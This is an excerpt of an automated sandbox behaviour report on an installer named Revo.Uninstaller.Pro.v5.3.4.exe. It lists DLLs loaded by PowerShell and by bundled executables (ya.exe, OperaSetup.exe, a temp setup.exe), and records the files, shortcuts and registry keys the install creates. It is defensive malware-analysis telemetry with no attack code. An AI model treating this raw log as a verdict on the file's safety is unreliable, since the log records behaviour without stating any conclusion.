        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: oleacc.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Section loaded: ncryptsslp.dll
        Source: C:\Users\user\Downloads\OperaSetup.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Downloads\OperaSetup.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: acgenral.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: samcli.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: msacm32.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: winmmbase.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: msimg32.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: dbghelp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: dbgcore.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: Revo Uninstaller Pro.lnk.0.dr | LNK file: ..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        Source: Revo Uninstaller Pro.lnk0.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        Source: Uninstall Revo Uninstaller Pro.lnk.0.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | File written: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Automated click: OK
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Automated click: Next >
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Automated click: Next >
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Automated click: Install
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | File opened: C:\Windows\SYSTEM32\RICHED32.DLL
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.inf
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.inf
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txt
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdf
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.bat
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldb
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\persian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\polish.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguese_standard.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\portuguesebrazil.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\romanian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\serbianLatin.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\simplifiedchinese.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovak.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\slovenian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\spanish.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\swedish.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\thai.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\traditionalchinese.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\turkish.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\ukrainian.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\vietnamese.ini
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Directory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Revo Uninstaller Pro
        Source: Revo.Uninstaller.Pro.v5.3.4.exe | Static file information: File size 22221229 > 1048576
        Source: Revo.Uninstaller.Pro.v5.3.4.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Work\VSRevo\Windows\Projects\VSProjectPro\build\x64\Release\VSProjectPro\VSProjectPro64.pdbU source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000607C000.00000004.00000020.00020000.00000000.sdmp
